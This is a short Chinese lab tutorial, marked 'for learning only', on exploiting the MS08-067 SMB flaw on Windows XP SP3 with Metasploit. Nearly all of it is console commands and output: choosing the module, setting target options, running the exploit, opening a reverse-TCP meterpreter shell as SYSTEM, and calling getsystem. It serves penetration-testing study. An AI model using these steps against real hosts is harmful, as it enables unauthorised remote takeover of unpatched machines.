本文简单介绍了如何使用metasploit针对ms08_067进行渗透测试,仅供学习
测试环境 | 描述 | ip |
---|---|---|
主机 | kali2020 | 192.168.1.113 |
目标主机 | win xp sp3 | 192.168.1.108 |
①启动msf,搜索ms08_067
msf6 > search ms08_067
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack Corruption
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_067_netapi
msf6 >
②使用ms08_067,设置参数,这里的target我设置为34,其他版本的可以使用show targets查看
msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.113 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf6 exploit(windows/smb/ms08_067_netapi) > set rhost 192.168.1.108
rhost => 192.168.1.108
msf6 exploit(windows/smb/ms08_067_netapi) > set target 34
target => 34
③进行攻击,获取meterpreter权限并进行提权
msf6 exploit(windows/smb/ms08_067_netapi) > exploit
[*] Started reverse TCP handler on 192.168.1.113:4444
[*] 192.168.1.108:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175174 bytes) to 192.168.1.108
[*] Meterpreter session 2 opened (192.168.1.113:4444 -> 192.168.1.108:2354) at 2021-05-20 08:55:20 +0800
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter >